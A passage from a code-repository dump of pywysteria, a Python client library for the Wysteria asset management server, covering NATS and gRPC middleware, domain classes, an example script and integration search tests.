`oid`\n\n Args:\n oid (str):\n facets (dict):\n key (str):\n find_func (func): function (str, str) -> []Version or []Item\n\n Raises:\n RequestTimeoutError\n ? Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"id\": oid,\n \"facets\": facets,\n })\n find_self = [domain.QueryDesc().id(oid)]\n\n reply = {}\n for count in range(0, NATS_MSG_RETRIES + 1):\n # Fire the update request to wysteria\n try:\n reply = self._single_request(data, key)\n break # if nothing goes wrong, we break out of the loop\n except (errors.RequestTimeoutError, queue.Empty) as e:\n if count >= NATS_MSG_RETRIES:\n raise\n\n # We sent an Update and it broke, let's not retry unless our\n # change *didn't* go through\n retry = False\n matching_wysteria_objects = find_func(find_self)\n if not matching_wysteria_objects:\n break # the obj has been deleted / id invalid? Let's break\n\n # Check if the keys we want to set are set already\n matching_obj = matching_wysteria_objects[0]\n for key, value in facets.items():\n if matching_obj.facets.get(key, \"\") != str(value):\n retry = True\n break\n\n # if all our desired facets are now set, then we can break out\n if not retry:\n break\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n raise Exception(err_msg)\n\n def update_version_facets(self, oid: str, facets: dict):\n \"\"\"Update version with matching ID with given facets.\n\n This is smart enough to only retry failed updates if the given update\n didn't set the desired fields when it failed.\n\n It's not perfect, but should be serviceable.\n\n Args:\n oid (str): version ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_VERSION,\n self.find_versions\n )\n\n def update_item_facets(self, oid: str, facets: dict):\n \"\"\"Update item with matching ID with given facets\n\n Args:\n oid (str): item ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_ITEM,\n self.find_items\n )\n\n def update_collection_facets(self, oid: str, facets: dict):\n \"\"\"Update collection with matching ID with given facets\n\n Args:\n oid (str): collection ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_COLLECTION,\n self.find_collections\n )\n\n def update_resource_facets(self, oid: str, facets: dict):\n \"\"\"Update resource with matching ID with given facets\n\n Args:\n oid (str): resource ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_RESOURCE,\n self.find_resources\n )\n\n def update_link_facets(self, oid: str, facets: dict):\n \"\"\"Update link with matching ID with given facets\n\n Args:\n oid (str): link ID to update\n facets (dict): new facets (these are added to existing facets)\n\n Raises:\n Exception on network / server error\n \"\"\"\n self._sync_update_facets_msg(\n oid,\n facets,\n _KEY_UPDATE_LINK,\n self.find_links\n )\n\n def _generic_create(\n self, request_data: dict, find_query: list, key: str, find_func, timeout: int=3\n ):\n \"\"\"Creation requests for\n - collection\n - item\n - resource\n - link\n\n Are similar enough that we can refactor their create funcs into one.\n Versions however, are a different animal.\n\n Args:\n request_data (dict): json data to send as creation request\n find_query ([]domain.QueryDesc): query to uniquely find the obj\n key (str): nats subject to send\n find_func: function to find desired obj\n timeout (float): time to wait before retry\n\n Returns:\n str\n \"\"\"\n reply = {}\n for count in range(0, NATS_MSG_RETRIES + 1):\n # send creation request\n try:\n reply = self._single_request(request_data, key)\n break # if nothing went wrong, we've created it successfully\n except (errors.RequestTimeoutError, queue.Empty) as e:\n if count >= NATS_MSG_RETRIES:\n raise\n\n # something went wrong, see if we created item\n results = find_func(find_query)\n if not results:\n continue # we didn't create it, try again\n\n # We did create it, return the id\n return results[0].id\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n self.translate_server_exception(err_msg)\n\n return reply.get(\"Id\")\n\n def create_collection(self, collection: domain.Collection):\n \"\"\"Create collection with given name, return ID of new collection\n\n Args:\n collection (domain.Collection):\n\n Returns:\n str\n \"\"\"\n data = json.dumps({\n \"Collection\": collection.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .name(collection.name)\n .parent(collection.parent)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_COLLECTION,\n self.find_collections\n )\n\n def create_item(self, item: domain.Item):\n \"\"\"Create item with given values, return ID of new item\n\n Args:\n item (wysteria.domain.Item): input item\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"Item\": item.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .item_type(item.item_type)\n .item_variant(item.variant)\n .parent(item.parent)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_ITEM,\n self.find_items\n )\n\n def create_version(self, version: domain.Version):\n \"\"\"Create item with given values, return ID of new version\n\n Args:\n version (wysteria.domain.Version): input version\n\n Returns:\n str, int\n\n Raises:\n Exception on network / server error\n \"\"\"\n # We can't uniquely identify the version we're hoping to create as the\n # server will increment the version number for us.\n # We could have the wysteria server implement a version reservation\n # scheme, but since we usually only care about the published version\n # we're just going to try again ..\n # ToDo: Consider version number reservation\n reply = self._sync_idempotent_msg(\n {\n \"Version\": version.encode(),\n },\n _KEY_CREATE_VERSION\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n self.translate_server_exception(err_msg)\n\n return reply.get(\"Id\"), reply.get(\"Version\")\n\n def create_resource(self, resource: domain.Resource):\n \"\"\"Create item with given values, return ID of new resource\n\n Args:\n resource (wysteria.domain.Resource): input resource\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"Resource\": resource.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .resource_type(resource.resource_type)\n .name(resource.name)\n .resource_location(resource.location)\n .parent(resource.parent)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_RESOURCE,\n self.find_resources\n )\n\n def create_link(self, link: domain.Link):\n \"\"\"Create item with given values, return ID of new link\n\n Args:\n link (wysteria.domain.Link): input link\n\n Returns:\n str\n\n Raises:\n Exception on network / server error\n \"\"\"\n data = json.dumps({\n \"Link\": link.encode(),\n })\n find_query = [\n domain.QueryDesc()\n .link_source(link.source)\n .link_destination(link.destination)\n ]\n return self._generic_create(\n data,\n find_query,\n _KEY_CREATE_LINK,\n self.find_links\n )\n\n def _generic_delete(self, oid: str, key: str):\n \"\"\"Call remote delete function with given params\n\n Args:\n oid (str):\n key (str):\n\n Returns:\n None\n\n Raises:\n Exception on any network / server err\n \"\"\"\n reply = self._sync_idempotent_msg(\n {\"id\": oid}, key\n )\n\n err_msg = reply.get(\"Error\")\n if err_msg:\n self.translate_server_exception(err_msg)\n\n def delete_collection(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_COLLECTION)\n\n def delete_item(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_ITEM)\n\n def delete_version(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n (Links will be deleted automatically)\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_VERSION)\n\n def delete_resource(self, oid: str):\n \"\"\"Delete the matching obj type with the given id\n\n Args:\n oid (str): id of obj to delete\n\n Raises:\n Exception if deletion fails / network error\n \"\"\"\n self._generic_delete(oid, _KEY_DELETE_RESOURCE)\n" }, { "alpha_fraction": 0.5640794038772583, "alphanum_fraction": 0.5667870044708252, "avg_line_length": 25.380952835083008, "blob_id": "e2f80c982c19be34ead1ab117d41b292ec7af8ce", "content_id": "fa57fec16bbfef3cf30087549be52633bff064be", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1108, "license_type": "permissive", "max_line_length": 66, "num_lines": 42, "path": "/examples/02/main.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\nExample02: Getting children\n\"\"\"\n\nimport wysteria\n\n\ndef main():\n client = wysteria.Client()\n with client:\n tiles = client.get_collection(\"tiles\")\n\n # get all child items regardless of item_type / variant\n all_items = tiles.get_items()\n\n # or we can be more specific\n print(\"--items--\")\n for i in tiles.get_items(item_type=\"tree\", variant=\"oak\"):\n print(i)\n\n # we can also grab an item by ID\n item_id = all_items[0].id\n item_one = client.get_item(item_id)\n print(\"ById:\", item_id, item_one)\n\n # we can grab the published version of each\n published = []\n print(\"--versions--\")\n for i in all_items:\n published_version = i.get_published()\n published.append(published_version)\n print(published_version)\n\n # and we can grab the version resources\n print(\"--resources--\")\n for published_version in published:\n for resource in published_version.get_resources():\n print(resource)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5625564455986023, "alphanum_fraction": 0.5742999315261841, "avg_line_length": 28.32450294494629, "blob_id": "1c369916c22a88ce74ffd012ba6edbd73df38d66", "content_id": "8d923525bf8696b1aaf5b98ba9ffaff46f3f835c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4428, "license_type": "permissive", "max_line_length": 96, "num_lines": 151, "path": "/tests/integration/tests/search_test.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import uuid\n\nimport wysteria\n\n\ndef _rs() -> str:\n \"\"\"Create and return some string at random\n\n Returns:\n str\n \"\"\"\n return uuid.uuid4().hex\n\n\nclass TestSearch:\n \"\"\"Tests for the Search class\"\"\"\n\n @classmethod\n def setup_class(cls):\n cls.client = wysteria.default_client()\n cls.client.connect()\n\n cls.common_facets = {\n _rs(): _rs(),\n }\n\n cls.collection1 = cls.client.create_collection(_rs(), facets=cls.common_facets)\n cls.collection2 = cls.client.create_collection(_rs(), facets=cls.common_facets)\n cls.item1 = cls.collection1.create_item(_rs(), _rs(), facets=cls.common_facets)\n cls.item2 = cls.collection2.create_item(_rs(), _rs(), facets=cls.common_facets)\n cls.version1 = cls.item1.create_version(facets=cls.common_facets)\n cls.version2 = cls.item2.create_version(facets=cls.common_facets)\n cls.link1 = cls.version1.link_to(_rs(), cls.version2, facets=cls.common_facets)\n cls.link2 = cls.item1.link_to(_rs(), cls.item2, facets=cls.common_facets)\n cls.resource1 = cls.version1.add_resource(_rs(), _rs(), _rs(), facets=cls.common_facets)\n cls.resource2 = cls.version2.add_resource(_rs(), _rs(), _rs(), facets=cls.common_facets)\n\n @classmethod\n def teardown_class(cls):\n cls.client.close()\n\n def test_search_pagination(self):\n # arrange\n item = self.collection1.create_item(_rs(), _rs())\n expected = [item.create_version() for _ in range(0, 100)]\n\n s = self.client.search()\n s.params(parent=item.id)\n\n limit = 10\n offset = 0\n found = limit + 1\n all_results = []\n\n # act & assert\n while found >= limit:\n results = s.find_versions(limit=limit, offset=offset)\n\n assert len(results) <= limit\n for r in results:\n assert r not in all_results\n\n offset += limit\n found = len(results)\n all_results.extend(results)\n\n assert len(expected) == len(all_results)\n for r in all_results:\n assert r in expected\n for r in expected:\n assert r in all_results\n\n @staticmethod\n def _perform_uri_search_test(fn, expected):\n # act\n result = fn(limit=10)\n\n # assert\n assert len(result) == 1\n assert result[0].uri == expected.uri\n assert result[0] == expected\n\n def test_uri_search_collection(self):\n # arrange\n expected = self.collection1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_collections, expected)\n\n def test_uri_search_item(self):\n # arrange\n expected = self.item1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_items, expected)\n\n def test_uri_search_versions(self):\n # arrange\n expected = self.version1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_versions, expected)\n\n def test_uri_search_resources(self):\n # arrange\n expected = self.resource1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_resources, expected)\n\n def test_uri_search_links(self):\n # arrange\n expected = self.link1\n s = self.client.search()\n s.params(uri=expected.uri)\n\n # act\n self._perform_uri_search_test(s.find_links, expected)\n\n def test_facet_search(self):\n # arrange\n s = self.client.search()\n s.params(facets=self.common_facets)\n\n expected = [\n (s.find_collections, [self.collection1, self.collection2]),\n (s.find_items, [self.item1, self.item2]),\n (s.find_versions, [self.version1, self.version2]),\n (s.find_resources, [self.resource1, self.resource2]),\n (s.find_links, [self.link1, self.link2]),\n ]\n\n for fn, expected_results in expected:\n # act\n results = fn(limit=10)\n\n # assert\n assert len(results) == len(expected_results)\n for r in results:\n assert r in expected_results\n\n for r in expected_results:\n assert r in results\n" }, { "alpha_fraction": 0.7486573457717896, "alphanum_fraction": 0.7486573457717896, "avg_line_length": 24.86111068725586, "blob_id": "6fd9c8e49169c52138e529524921e017b7238200", "content_id": "628f99c6423e42cf2fd21e55556e0ae8adc499da", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1862, "license_type": "permissive", "max_line_length": 95, "num_lines": 72, "path": "/wysteria/__init__.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"The wysteria module provides a python interface for talking to a wysteria asset management\nserver.\n\n\nFiles:\n------\n\n- client.py\n high level class that wraps a middleware connection & adds some helpful functions.\n- constants.py\n various constants used\n- errors.py\n contains various exceptions that can be raised\n- search.py\n simple class for building wysteria search params\n- utils.py\n simple utility functions for reading config files and other misc stuff\n\n\nModules\n-------\n\n - domain\n python wrappers around various wysteria native objects\n - middleware\n python implementations of the communication protocol for talking to the server\n\n\nExported\n--------\n\n Client\n Wysteria client wrapper class\n\n TlsConfig\n Simplified TLS config object that can be used to secure the middleware connection\n\n errors\n Error module that contains various exceptions that can be raised by the client\n\n default_client\n Sugar function to build & configure a client. Searches for a wysteria client config & falls\n back on using some default hardcoded settings if all else fails.\n\n from_config\n Construct & configure a client from a given config file.\n\n\"\"\"\nfrom wysteria.client import Client\nfrom wysteria import errors\nfrom wysteria.constants import FACET_COLLECTION\nfrom wysteria.constants import FACET_ITEM_TYPE\nfrom wysteria.constants import FACET_ITEM_VARIANT\nfrom wysteria.constants import FACET_LINK_TYPE\nfrom wysteria.constants import VALUE_LINK_TYPE_VERSION\nfrom wysteria.constants import VALUE_LINK_TYPE_ITEM\nfrom wysteria.utils import default_client\nfrom wysteria.utils import from_config\n\n\n__all__ = [\n \"Client\",\n \"errors\",\n \"default_client\",\n \"from_config\",\n \"FACET_COLLECTION\",\n \"FACET_ITEM_TYPE\",\n \"FACET_ITEM_VARIANT\",\n \"FACET_LINK_TYPE\",\n \"VALUE_LINK_TYPE_VERSION\",\n \"VALUE_LINK_TYPE_ITEM\",\n]\n" }, { "alpha_fraction": 0.5317717790603638, "alphanum_fraction": 0.532699465751648, "avg_line_length": 24.069766998291016, "blob_id": "f7cadc76cf0ac403e313af81e5185d04ce67b668", "content_id": "a09692f1eedde1ed1f206ee0526337a5fbd89849", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4312, "license_type": "permissive", "max_line_length": 90, "num_lines": 172, "path": "/wysteria/domain/collection.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "\"\"\"\n\n\"\"\"\nfrom copy import copy\n\nimport wysteria.constants as consts\nfrom wysteria.domain.base import ChildWysObj\nfrom wysteria.domain.item import Item\nfrom wysteria.domain.query_desc import QueryDesc\n\n\nclass Collection(ChildWysObj):\n\n def __init__(self, conn, **kwargs):\n super().__init__(**kwargs)\n self.__conn = conn\n self._name = kwargs.get(\"name\")\n\n def _encode(self) -> dict:\n \"\"\"Return the dict representation of this object\n\n Returns:\n dict\n \"\"\"\n return {\n \"id\": self.id,\n \"uri\": self._uri,\n \"name\": self.name,\n \"parent\": self._parent,\n \"facets\": self.facets,\n }\n\n def __eq__(self, other):\n if not isinstance(other, Collection):\n raise NotImplementedError()\n\n return all([\n self.id == other.id,\n self.name == other.name,\n self.parent == other.parent,\n ])\n\n def _fetch_uri(self) -> str:\n \"\"\"Fetch uri from remote server.\n\n Returns:\n str\n \"\"\"\n result = self.__conn.find_collections([QueryDesc().id(self.id)], limit=1)\n if result:\n return result[0].uri\n return \"\"\n\n @property\n def name(self) -> str:\n \"\"\"Return the name of this collection\n\n Returns:\n str\n \"\"\"\n return self._name\n\n def delete(self):\n \"\"\"Delete this collection. \n \"\"\"\n return self.__conn.delete_collection(self.id)\n\n def create_collection(self, name: str, facets: dict=None):\n \"\"\"Create a sub collection of this collection\n\n Args:\n name (str): name of collection\n facets (dict): default facets to set on new collection\n\n Returns:\n domain.Collection\n \"\"\"\n cfacets = copy(facets)\n if not cfacets:\n cfacets = {}\n\n cfacets[consts.FACET_COLLECTION] = cfacets.get(consts.FACET_COLLECTION, self.name)\n\n c = Collection(self.__conn, name=name, parent=self.id, facets=cfacets)\n c._id = self.__conn.create_collection(c)\n return c\n\n def _update_facets(self, facets: dict):\n \"\"\"Performs the actual facet update via wysteria\n\n Args:\n facets: dict\n\n \"\"\"\n self.__conn.update_collection_facets(self.id, facets)\n\n def get_collections(self, name: str=None):\n \"\"\"Return child collections of this collection\n\n Args:\n name (str):\n\n Returns:\n []domain.Collection\n \"\"\"\n query = QueryDesc().parent(self.id)\n if name:\n query.name(name)\n return self.__conn.find_collections([query])\n\n def create_item(self, item_type: str, variant: str, facets: dict=None) -> Item:\n \"\"\"Create a child item with the given name & variant.\n\n Note a collection can only have one item with a given type & variant\n\n Args:\n item_type (str):\n variant (str):\n facets (dict):\n\n Returns:\n domain.Item\n \"\"\"\n cfacets = copy(facets)\n if not cfacets:\n cfacets = {}\n\n cfacets[consts.FACET_COLLECTION] = self.name\n\n i = Item(\n self.__conn,\n parent=self.id,\n itemtype=item_type,\n variant=variant,\n facets=cfacets,\n )\n i._id = self.__conn.create_item(i)\n return i\n\n def get_items(self, item_type: str=None, variant: str=None):\n \"\"\"Return all child items of this\n\n Args:\n item_type (str): only get item(s) of the given type\n variant (str): only get variant(s) of the given type\n\n Returns:\n []domain.Item\n \"\"\"\n query = QueryDesc().parent(self.id)\n\n if item_type:\n query.item_type(item_type)\n\n if variant:\n query.item_variant(variant)\n\n return self.__conn.find_items([query])\n\n def _get_parent(self):\n \"\"\"Return the parent Collection of this Collection\n\n Returns:\n domain.Collection or None\n \"\"\"\n results = self.__conn.find_collections(\n [QueryDesc().id(self.parent)],\n limit=1\n )\n if results:\n return results[0]\n return None\n" }, { "alpha_fraction": 0.5154350399971008, "alphanum_fraction": 0.5167461037635803, "avg_line_length": 22.370473861694336, "blob_id": "7d9c9f8ea7aa4cf528c2862cec0b24a3b7b222a0", "content_id": "5fe60f9ae023e592e9027f65821a7848f09f14fc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16780, "license_type": "permissive", "max_line_length": 95, "num_lines": 718, "path": "/wysteria/middleware/impl_grpc.py", "repo_name": "voidshard/pywysteria", "src_encoding": "UTF-8", "text": "import grpc\nimport json\n\nfrom google.protobuf.struct_pb2 import Struct\n\nfrom wysteria import domain\nfrom wysteria.middleware.abstract_middleware import WysteriaConnectionBase\nfrom wysteria.middleware.wgrpc import stubs\nfrom wysteria.middleware.wgrpc.wysteria import grpc_pb2 as pb\n\n\n_DEFAULT_URI = \":31000\" # default localhost, grpc port\n_DEFAULT_LIMIT = 500\n\n\ndef _get_secure_channel(url, tls):\n \"\"\"Return secure channel to server.\n\n Stolen from: https://www.programcreek.com/python/example/95418/grpc.secure_channel\n\n Args:\n url: host/port info of server\n tls: namedtuple of tls settings\n\n Returns:\n grpc.Channel\n\n Raises:\n IOError\n SSLError\n\n \"\"\"\n credentials = grpc.ssl_channel_credentials(open(tls.cert).read())\n\n # create channel using ssl credentials\n return grpc.secure_channel(\n url, credentials, options=(\n ('grpc.ssl_target_name_override', \"ABCD\",),\n )\n )\n\n\ndef _handle_rpc_error(func):\n def fn(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except grpc.RpcError as e:\n error_data = json.loads(e.debug_error_string())\n WysteriaConnectionBase.translate_server_exception(\n error_data.get(\"grpc_message\", str(e))\n )\n return fn\n\n\nclass GRPCMiddleware(WysteriaConnectionBase):\n \"\"\"Wysteria middleware client using gRPC to manage transport.\n\n \"\"\"\n def __init__(self, url, tls=None):\n self._url = url\n self._tls = tls\n self._channel = None\n self._stub = None\n\n def connect(self):\n \"\"\"Connect to the other end.\n\n \"\"\"\n if self._tls:\n if self._tls.enable:\n self._channel = grpc.secure_channel(self._url, self._tls)\n else:\n self._channel = grpc.insecure_channel(self._url)\n else:\n self._channel = grpc.insecure_channel(self._url)\n\n self._stub = stubs.WysteriaGrpcStub(self._channel)\n\n def close(self):\n self._channel.close()\n\n @_handle_rpc_error\n def _generic_find(self, query, limit, offset, finder, decoder):\n \"\"\"Perform a generic wysteria query.\n\n Args:\n query: query object to encode\n limit: limit to apply\n offset: offset to apply\n finder: function to call & pass query to\n decoder: function to decode result objects\n\n Returns:\n list\n\n \"\"\"\n reply = finder(\n pb.QueryDescs(\n Limit=limit,\n Offset=offset,\n all=[self._encode_query_desc(q) for q in query if q.is_valid]\n )\n )\n\n err = reply.error.Text\n if err:\n self.translate_server_exception(err)\n\n return [decoder(i) for i in reply.all]\n\n @_handle_rpc_error\n def _generic_create(self, obj, encoder, func):\n \"\"\"\n\n Args:\n obj: obj to encode\n encoder: function to do the encoding\n func: function to call (create func)\n\n Returns:\n str\n\n \"\"\"\n reply = func(encoder(obj))\n err = reply.error.Text\n if err:\n self.translate_server_exception(err)\n\n return reply.Id\n\n @_handle_rpc_error\n def _generic_update(self, oid, facets, func):\n \"\"\"\n\n Args:\n oid: Id of obj to update\n facets: Facets to set\n func: Update function to call\n\n \"\"\"\n result = func(pb.IdAndDict(Id=oid, Facets=facets))\n err = result.Text\n if err:\n self.translate_server_exception(err)\n\n @_handle_rpc_error\n def _generic_delete(self, oid, func):\n \"\"\"Call remote delete.\n\n Args:\n oid: id of obj to delete\n func: delete function\n\n \"\"\"\n result = func(pb.Id(Id=oid))\n\n err = result.Text\n if err:\n self.translate_server_exception(err)\n\n def find_collections(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Collection\n\n Raises:\n Exception on network / server error\n\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindCollections,\n self._decode_collection\n )\n\n def find_items(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Item\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindItems,\n self._decode_item\n )\n\n def find_versions(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Version\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindVersions,\n self._decode_version\n )\n\n def find_resources(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Resource\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindResources,\n self._decode_resource\n )\n\n def find_links(self, query, limit=_DEFAULT_LIMIT, offset=0):\n \"\"\"Query server & return type appropriate matching results\n\n Args:\n query ([]domain.QueryDesc): search query(ies) to execute\n limit (int): limit number of returned results\n offset (int): return results starting from some offset\n\n Returns:\n []domain.Link\n\n Raises:\n Exception on network / server error\n \"\"\"\n return self._generic_find(\n query,\n limit,\n offset,\n self._stub.FindLinks,\n self._decode_link\n )\n\n def get_published_version(self, oid):\n \"\"\"Get the published version for the given Item id.\n\n Args:\n oid: id of parent Item\n\n Returns:\n Version\n\n \"\"\"\n result = self._stub.PublishedVersion(pb.Id(Id=oid))\n\n err = result.error.Text\n if err:\n self.translate_server_exception(err)\n\n return self._decode_version(result)\n\n def publish_version(self, oid):\n \"\"\"Publish the given version id.\n\n Args:\n oid: id of version to set as published\n\n \"\"\"\n result = self._stub.SetPublishedVersion(pb.Id(Id=oid))\n\n err = result.Text\n if err:\n self.translate_server_exception(err)\n\n def update_collection_facets(self, oid, facets):\n \"\"\"Update facets of a given Collection.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateCollectionFacets)\n\n def update_item_facets(self, oid, facets):\n \"\"\"Update facets of a given Item.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateItemFacets)\n\n def update_version_facets(self, oid, facets):\n \"\"\"Update facets of a given Version.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateVersionFacets)\n\n def update_resource_facets(self, oid, facets):\n \"\"\"Update facets of a given Resource.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateResourceFacets)\n\n def update_link_facets(self, oid, facets):\n \"\"\"Update facets of a given Link.\n\n Args:\n oid: id of object to update\n facets: dictionary of facets to set\n\n \"\"\"\n self._generic_update(oid, facets, self._stub.UpdateLinkFacets)\n\n def create_collection(self, collection):\n \"\"\"Create a Collection.\n\n Args:\n collection:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n collection, self._encode_collection, self._stub.CreateCollection\n )\n\n def create_item(self, item):\n \"\"\"Create a Item.\n\n Args:\n item:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n item, self._encode_item, self._stub.CreateItem\n )\n\n def create_version(self, version):\n \"\"\"Create a Version.\n\n Args:\n version:\n\n Returns:\n str, int\n\n \"\"\"\n reply = self._stub.CreateVersion(self._encode_version(version))\n\n err = reply.Text\n if err:\n self.translate_server_exception(err)\n\n return reply.Id, reply.Version\n\n def create_resource(self, resource):\n \"\"\"Create a Resource.\n\n Args:\n resource:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n resource, self._encode_resource, self._stub.CreateResource\n )\n\n def create_link(self, link):\n \"\"\"Create a Link.\n\n Args:\n link:\n\n Returns:\n str\n\n \"\"\"\n return self._generic_create(\n link, self._encode_link, self._stub.CreateLink\n )\n\n def delete_collection(self, oid):\n \"\"\"Delete collection.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteCollection)\n\n def delete_item(self, oid):\n \"\"\"Delete item.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteItem)\n\n def delete_version(self, oid):\n \"\"\"Delete version.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteVersion)\n\n def delete_resource(self, oid):\n \"\"\"Delete resource.\n\n Args:\n oid: id of obj to delete\n\n \"\"\"\n self._generic_delete(oid, self._stub.DeleteResource)\n\n # -- Encoders\n def _encode_query_desc(self, q: domain.QueryDesc):\n \"\"\"\n\n Args:\n q: domain.QueryDesc\n\n Returns:\n pb.QueryDesc\n \"\"\"\n return pb.QueryDesc(\n Parent=q._parent,\n Id=q._id,\n Uri=q._uri,\n VersionNumber=q._versionnumber,\n ItemType=q._itemtype,\n Variant=q._variant,\n Facets=self._encode_dict(q._facets),\n Name=q._name,\n ResourceType=q._resourcetype,\n Location=q._location,\n LinkSrc=q._linksrc,\n LinkDst=q._linkdst,\n )\n\n def _encode_collection(self, o: domain.Collection):\n \"\"\"\n\n Args:\n o: domain.Collection\n\n Returns:\n pb.Collection\n\n \"\"\"\n return pb.Collection(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n Name=o.name,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_item(self, o: domain.Item):\n \"\"\"\n\n Args:\n o: domain.Item\n\n Returns:\n pb.Item\n\n \"\"\"\n return pb.Item(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n ItemType=o.item_type,\n Variant=o.variant,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_version(self, o: domain.Version):\n \"\"\"\n\n Args:\n o: domain.version\n\n Returns:\n pb.version\n\n \"\"\"\n return pb.Version(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n Number=o._number,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_resource(self, o: domain.Resource):\n \"\"\"\n\n Args:\n o: domain.Resource\n\n Returns:\n pb.Resource\n\n \"\"\"\n return pb.Resource(\n Parent=o.parent,\n Id=o.id,\n Uri=o._uri,\n Name=o.name,\n ResourceType=o.resource_type,\n Location=o.location,\n Facets=self._encode_dict(o.facets),\n )\n\n def _encode_link(self, o: domain.Link):\n \"\"\"\n\n Args:\n o: domain.Link\n\n Returns:\n pb.Link\n\n \"\"\"\n return pb.Link(\n Id=o.id,\n Uri=o._uri,\n Src=o.source,\n 